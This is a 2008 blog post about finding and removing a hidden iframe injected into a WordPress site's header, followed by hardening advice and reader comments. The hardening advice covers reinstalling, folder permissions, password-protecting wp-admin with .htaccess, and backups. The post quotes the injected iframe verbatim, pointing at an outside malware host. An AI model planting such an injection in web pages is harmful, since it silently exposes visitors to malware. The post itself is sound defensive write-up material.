I woke up today morning to find that my site feed wasn’t validating and the XMLRPC was not responding when I tried to update MarsEdit. Upon doing a quick “View Source” I found a foreign code lodged on top of my site’s header. I knew instantly that it shouldn’t be there and that something is wrong. The code was <iframe src="http://avwav.com/3332.htm" style="display:none">. Here is a list of malware sites.
The sane action was to look if it is infecting the whole site or just the Wordpress Install (I’m on Wordpress 2.5.1). After finding it in just the Wordpress powered section of the site, I went ahead and did the following action to remove the code and to prevent further complications to my Wordpress Installation.
PREPARE
- Jot down the list of plugins I need
- Back-up Theme
- Back-up “config.php”
- Back-up and downloaded the Database with Wordpress Database Backup
- You should back-up
/wp-content/uploads/if you use Wordpress to upload your files. (see below how I manage my files)
REFRESH
Then, I re-did the whole Wordpress Installation. However, I wasn’t worried because my “uploads” are elsewhere, Database was not infected and is back-up everyday by mailing it to myself and archived instantly with Gmail. Here is what I did
- Delete the whole “wp” folder. Yes, I always make it a point that the whole Wordpress Install files are inside a separate folder.
- Upload a fresh set of Wordpress files onto “w” (you can have any folder you like)
- Upload Plugins
- Upload Theme
- Upload “wp-config.php”
That’s it. With a fresh Wordpress Install, the script/code injection is gone and my Wordpress Installation is back to normal.
EXTRA PRECAUTION
I decided to take some extra precaution and secure my Wordpress Installation henceforth. Here are few things I did in addition to installation a fresh new Wordpress Installation.
Take care that none of your folders are public-writa-able
Make sure that none of your folders are Public-Write allowed (CHMOD 777). There are instances when you need to set your folders to Write mode with CHMOD 777 (everybody writes) but remember to set it back to 755 (only owner writes) when not needed or at least CHMOD 775 (owner and group writes).
Restrict access to “wp-admin” with .htaccess
It is pretty easy to drop a .htaccess to your “wp-admin” folder so only you or few of your editors/authors can access that folder. This way, you’ll need to use 2 passwords to login to your Wordpress Admin. Anyway, I use Keychain to remember them, so I need to type just once. This is what I have in my .htaccess file;
AuthUserFile /path-to-file/outside-of-your-site-folder/.htpasswd AuthName "You need to have an access credential!" AuthType Basic require user Brajeshwar
You’ll need a file .htpasswd which should contain a Username:Password pair. Remember, the password is hashed here and is not what you see. There are lots of .htpasswd password generators. Use one of them;
Note: You can have multiple Username:Password pairs by having as many as you want in separate lines.
Now, drop this .htpasswd file in your “/path-to-file/outside-of-your-site-folder/”. See to it that this is not in your site folder (e.g. www, public_html) but outside of that which only you have access and not from the website.
Many Wordpress advocates and experts alike have talked about securing your Wordpress Installation and so I won’t go deeper than what I’ve already written above. It’s is your choice, how paranoid you can get. Nonetheless, as we’re already here, let me give you another bonus tip.
Prevent comment spam by denying access to no-referrer requests
Add this in your .htaccess Redirect section.
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{REQUEST_URI} .wp-comments-post\.php*
RewriteCond %{HTTP_REFERER} !.*brajeshwar.com.* [OR]
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule ^(.*)$ ^http://wordpress.org/$ [R=301,L]
Note: Change that brajeshwar.com to your domain.
HOW I MANAGE MY FILES (MEDIA, IMAGES, DOWNLOADS)
As mentioned above, I have my own way of managing files which I felt is effective and easy to move around if I need to change host or any other eventuality may arise.
Separate sub-domain for media files (images, audio, video)
Having these files on a separate sub-domain allows me to move this anywhere I like and just do a DNS-IP Redirect or a CNAME change to have this located anywhere. So, my articles will always point to the sub-domain and thus always works wherever I move the media files (different location or servers). Currently, they are hosted on Amazon S3. Btw, I’m likely to write an article for Digital Inspiration, for non-geeks and common-users on how to use Amazon S3 the easy way.
What if you’ve used /wp-content/uploads/ throughout and you want to change it now?
Easy! In your .htaccess file, add a perma-redirect by adding this code
RewriteRule ^wp-content/uploads(.*)$ http://media.brajeshwar.com.s3.amazonaws.com$1 [L,R=301]
This should now perma-redirect all reference to /uploads/ to the corresponding new location.
Backup DB daily or Weekly
If your site is busy and you blog regularly, have a daily backup of your Database mailed to you or use weekly if your site is not that prolific. Wordpress Database Backup can email you a back-up daily, weekly or monthly. I’ve it mailed to my Gmail Account and set a filter in Gmail to Archive it as it arrives.
Wordpress Theme
Of course, as I always use my own theme, I’ve my local copy and another on my SVN server. So, always have a local copy of your theme.
Wordpress Plugins
Don’t even worry about them unless you’ve written one yourself or have modified one. They’re all everywhere or at-least well preserved at Wordpress Plugins.
Keepass
While on the topic of security, let me tell you that I’m a die-hard fan of Keepass and now KeepassX on the Mac. There is even a Linux version and the encrypted file which contains your passwords will work on all the Platforms. This makes it easy to have access to the plethora of passwords even when you’re away from your Mac and in the wild where Windows is pretty common. At the time of writing this article, I’ve harvested over 2000+ passwords used on various sites and applications and all have a different password. You can either use a Master Password or even a Key Disc to unlock KeepassX, making it rather secure.
That’s pretty much it. Feel free to comment, ask questions and I might be able to discuss further.
Don't like it? There are lots of published articles, pick a random one.
Brajeshwar posted this article
on Wed, Jul 9th, 2008 at 12:02 pm
Categorized under Asides, General and has the following tags
Comments Post Yours
There are 17 responses so far. You can follow any responses to this entry through the RSS feed. You can leave a response, or trackback from your own site.
Your article was very informative. I guess we need to keep checking our source codes once in a while.
Nice article.
Stumbled!
I recommend changing your WordPress password as well, just in case.
@Joseph
Thanks for the tip.
I think it should be noted that denying no-referrer comments prevents some legitimate posts as well. Norton (and perhaps some other security suites) strips out referrer information from requests, supposedly by default.
Did you investigate at all what the attacker did to make changes to your installation? This could either be a new, previously unpublicized vulnerability in WP. Or did you not entirely lock down your installation like you describe above?
I’d suggest looking for POSTs in your web server’s apache logs.
You should also change all of your passwords, both ,htaccess ones, and your all of your WP user passwords.
@Michael
I looked around a bit but could not find anything relevant. I do not have access to Mosso’s system and nor do they give us SSH.
So, the best thing I thought was to secure everything and bring back to normalcy, and to later look around the internet for its relevant information. Unluckily, there are few and far in between info about the attack.
Sorry, I’ve, at this time, no idea about how it is caused and where it originates.
Hi,
Thanks for this.
The article was very easy to follow and nice to read. I will definetely link to it on my own wordpress install.
Thanks.
Nice article. Hope you don’t mind that I add a couple of tips myself.
@Shane
Thanks, those tips looks real hardcore and bad-ass.
It’s always good to have a little of paranoia with these things (backup db daily, restrict access to admin page, etc.)
Great tips, thanks for sharing.
I going to make a preventive plan based on your article. It’s better late than none.
Good article, stumble.
@Hamdani
That’s nice.
Post yours